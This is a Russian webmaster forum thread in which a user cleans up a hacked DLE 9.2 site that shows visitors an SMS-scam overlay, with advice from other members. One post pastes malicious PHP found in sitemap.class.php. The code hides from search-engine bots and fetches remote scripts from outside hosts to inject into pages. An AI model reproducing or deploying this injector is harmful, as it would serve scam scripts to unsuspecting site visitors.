Взломан сайт на DLE помогите!

12
S
На сайте с 03.07.2008
Offline
56
2097

Взломали сайт на DLE 9.2. При нажатии в любом месте страницы поверх сайта вылезает окно с текстом "Уважаемые посетители! В последнее время наш сайт регулярно стал подвергаться атакам со стороны ботов. Для предотвращения данной ситуации мы приняли решение ввести обязательную авторизацию для всех посетителей. Введите номер Вашего телефона, на него придет бесплатное смс сообщение с кодом авторизации.Данная процедура является абсолютно бесплатной! С Уважением, администрация сайта!" и с полем для ввода номера телефона. Ну короче развод на смс. Нашел шелл в движке - снес. Нашел изменения в файле main.tpl и admin.php - тоже убрал. Короче теперь окно не появляется на самом сайте. Зато появляется в админке при попытке например создать sitemap. Уже не знаю где искать! Помогите!

BrightGuy
На сайте с 03.10.2010
Offline
179
#1

Если шелл удалили и просто не можете убрать последствия, тогда перезалейте файлы админки да и все.

-= Сайты на заказ | Правки, обновление, работы по DLE =- (/ru/forum/791118) Skype: rus.shevchuk (skype:rus.shevchuk?chat) | Telegram: @ruslansh (tg://resolve?domain=ruslansh) | ICQ: 606535768 | info@ruslan-shevchuk.com
S
На сайте с 03.07.2008
Offline
56
#2

Не помогает. Файл админки вызывает модули для разных функций, где то в них видимо есть еще код вредоносный

W
На сайте с 10.05.2009
Offline
114
#3

в шаблоне админке поищите, он в отдельной папке

S
На сайте с 03.07.2008
Offline
56
#4

И еще, как массово указать всем файлам и папкам права доступа 755 на папки и 644 на файлы? А то шелл всем выставил 777 и я замучался уже менять вручную права каждому файлику.

---------- Добавлено 14.05.2012 в 19:40 ----------

как называется шаблон админки? и в какой папке? в templates не нахожу

W
На сайте с 10.05.2009
Offline
114
#5

engine\skins\default.skin.php смотри

Права можно выставить в пенельке рекурсией, ispmanager может это, другие незнаю.

S
На сайте с 03.07.2008
Offline
56
#6

/engine/inc/include/init.php вот где еще код был, заменил файл нормальным и все путем стало. У меня на сервере как раз ISP стоит. Не скажете как там этой рекурсией права выставить?

R
На сайте с 24.01.2008
Offline
180
#7
Snurik:
/engine/inc/include/init.php вот где еще код был, заменил файл нормальным и все путем стало. У меня на сервере как раз ISP стоит. Не скажете как там этой рекурсией права выставить?

На сколько помню в этом файле код, похожий на вирусный, но там так закодирована лицензия, вы точно проверили, что сейчас все ок?

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
S
На сайте с 03.07.2008
Offline
56
#8

Было все в порядке. А к ночи стало интереснее. При любом действии в админке все очень тормозит и почему то отправляется запрос на сайт upgrade9.net не знаю что за сайт, вижу в Опере что туда запрос идет. Там сайт не отвечает и тогда уже работает мой сайт. Как узнать куда он там ломится и что именно посылает запрос?

WebGomel
На сайте с 29.10.2011
Offline
78
#9

Snurik, ну так скорее всего не всё вычистили. Да и шелл наверное у вас есть.

Айболит я так смотрю, вы запустить не смогли, хотите - киньте в личку фтп, посмотрю шеллы, может по пути и другое что интересное найду.

Удалённый системный администратор ( https://remadmin.com )
S
На сайте с 03.07.2008
Offline
56
#10

Шелл я уже удалил. И почистил где нашел. Думается придется весь движок перезаливать. Айболит запустил в папке engine. Он там много чего нашел даже не относящегося к вредоносному.

---------- Добавлено 15.05.2012 в 02:30 ----------

/engine/classes/sitemap.class.php там еще вредоносный код. там ссылки на пару адресов левых

<?php

if (!preg_match('/(accoona|ia_archiver|antabot|ask jeeves|baidu|eltaindexer|feedfetcher|

gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|

worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|

mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|

yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)/i',

$_SERVER['HTTP_USER_AGENT'])) {

$urlp = "http://all-php.ru/?i=42084&c=3";

$urlpurs="http://masvip.ru/2095/take.html";

$code = @file_get_contents($urlp);

$code2 = @file_get_contents($urlpurs);

$data = substr($code,strpos($code,'document'),(strpos($code,');')+2) - strpos

($code,'document'));

$data2 = substr($code2,strpos($code2,'><!--')+5,(strpos($code2,'\')')+2) - (strpos

($code2,'><!--')+5));

header('Content-Type: text/javascript; windows-1251');

echo $data;

echo $data2;

//echo $code2;

}

?>

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий